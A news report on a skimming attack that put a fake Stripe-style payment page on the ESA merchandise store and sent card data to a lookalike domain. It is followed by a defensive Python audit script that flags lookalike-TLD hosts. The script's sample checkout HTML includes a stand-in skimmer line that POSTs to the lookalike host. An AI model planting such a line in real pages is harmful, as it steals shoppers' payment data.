The European Space Agency (ESA) merchandise store fell victim to a cyberattack in which malicious actors implanted a script that loaded a fraudulent, Stripe-styled payment page. The breach was uncovered on December 23; the script fired at the final stage of checkout and harvested user data, including credit card details.
With a budget exceeding €10 billion, ESA spearheads groundbreaking advancements in space exploration, ranging from astronaut training to the development of rockets and satellites. The online store, licensed to sell ESA-branded memorabilia, has temporarily suspended operations, leaving a notice on its website stating it is “temporarily out of orbit.”
E-commerce security firm Sansec identified the malicious code and warned that the store’s integration with ESA systems could pose a threat not only to customers but also to agency employees.
The malware embedded in the official ESA store directed data to a domain resembling the legitimate one but utilizing a different top-level domain (TLD). Instead of the authorized “esaspaceshop[.]com,” attackers employed “esaspaceshop[.]pics,” as observed in the website’s source code.
Researchers from Source Defense confirmed that the counterfeit payment page was meticulously disguised as genuine, incorporating elements from the Stripe SDK. Visually indistinguishable from the original, the fake page was served directly from ESA’s site, leaving users unsuspecting.
Although the store has since removed the fraudulent payment page, the malicious script remains embedded in its source code. ESA clarified that the store operates on third-party infrastructure, and the agency does not manage its data. A Whois lookup corroborates that ESA’s domain and its store are registered separately.
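A defender-side check for the pattern described above (a skimmer exfiltrating to a lookalike domain that reuses the store's name under a different TLD). This is an added example, not code from the article, ESA, or any of the firms quoted: it audits a page's HTML for every host it would contact and flags hosts that share the store's second-level label but not its suffix. The sample HTML, the inline script that stands in for an injected skimmer, and the allowlist are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Third parties a checkout page is legitimately expected to load (constructed allowlist).
ALLOWED_THIRD_PARTIES = {"js.stripe.com"}
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+", re.IGNORECASE)


class HostCollector(HTMLParser):
    """Collect hosts from src/action/href attributes and from URL literals inside inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.hosts = set()
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        self._in_script = self._in_script or tag == "script"
        for name, value in attrs:
            host = urlsplit(value).hostname if name in ("src", "action", "href") and value else None
            if host:
                self.hosts.add(host.lower())

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # HTMLParser hands script bodies to handle_data verbatim
            self.hosts.update(urlsplit(u).hostname.lower() for u in URL_RE.findall(data))


def classify_host(host, site_host):
    """Label a referenced host relative to the store's own domain."""
    if host == site_host or host.endswith("." + site_host):
        return "first-party"
    if host in ALLOWED_THIRD_PARTIES:
        return "allowed-third-party"
    labels, site_labels = host.split("."), site_host.split(".")
    # Same second-level label as the store, different suffix: the TLD-swap lookalike pattern.
    if len(labels) >= 2 and labels[-2] == site_labels[-2]:
        return "lookalike-tld"
    return "unexpected-third-party"


def audit_page(html, site_host):
    """Return {host: label} for hosts the page contacts that are neither first-party nor allowlisted."""
    parser = HostCollector()
    parser.feed(html)
    findings = {}
    for host in sorted(parser.hosts):
        label = classify_host(host, site_host)
        if label not in ("first-party", "allowed-third-party"):
            findings[host] = label
    return findings


# Constructed checkout page: legitimate Stripe include plus an inline stand-in for an injected skimmer.
SAMPLE_CHECKOUT_HTML = """<html><body>
<script src="https://js.stripe.com/v3/"></script>
<script src="/static/checkout.js"></script>
<script>fetch("https://esaspaceshop.pics/collect", {method: "POST"});</script>
<form action="https://esaspaceshop.com/checkout"></form>
</body></html>"""

if __name__ == "__main__":
    print(audit_page(SAMPLE_CHECKOUT_HTML, "esaspaceshop.com"))  # {'esaspaceshop.pics': 'lookalike-tld'}
```

Run the audit against a saved copy of the checkout page (or a periodic fetch of it) and alert on any new finding; a lookalike-tld hit is the signal described in this incident.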